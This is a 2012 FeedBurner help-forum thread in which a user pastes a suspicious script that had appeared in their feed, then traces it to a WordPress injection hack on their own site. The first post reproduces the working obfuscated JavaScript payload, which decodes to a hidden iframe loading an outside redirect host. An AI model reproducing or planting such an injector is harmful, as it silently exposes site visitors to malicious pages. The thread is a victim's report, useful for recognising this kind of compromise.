feedburner hacked?

80 views
Skip to first unread message

rvh

unread,
May 22, 2012, 6:00:56 PM5/22/12
to FeedBurner Help Group - Feed and Web Statistics
starting a couple of days ago the feeds from my feedburner url have a
weird <script> at the beginning. causes parsers to crash and it looks
suspicious. this is not my source feed. someone take a look please?
here's the block:

<script>i=0;try{avasv=prototype;}catch(z)
{h="harCode";f=['-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f74f77f59f68f56f72f67f68f58f60f75f63f4f67f79f72f59f58f63f72f59f57f74f4f75f73f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f74f77f59f68f56f72f67f68f58f60f75f63f4f67f79f72f59f58f63f72f59f57f74f4f75f73f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83']
[0].split('f');v="e"+"va";}if(v)e=window[v
+"l"];try{q=document.createElement("div");q.appendChild(q+"");}
catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;587!=i;i+=1)
{j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);}
if(v&&e&&r&&z&&h&&s&&f&&v)e(s);</script>

rvh

unread,
May 23, 2012, 1:01:38 AM5/23/12
to feedburner...@googlegroups.com
not feedburner's fault. got hit with the wordpress base64 hack and it spread via rss to my feedburner's link. now have to deal with the fallout. 

so guess i actually have feedburner to thank for putting me wise to the hack.
Reply all
Reply to author
Forward
0 new messages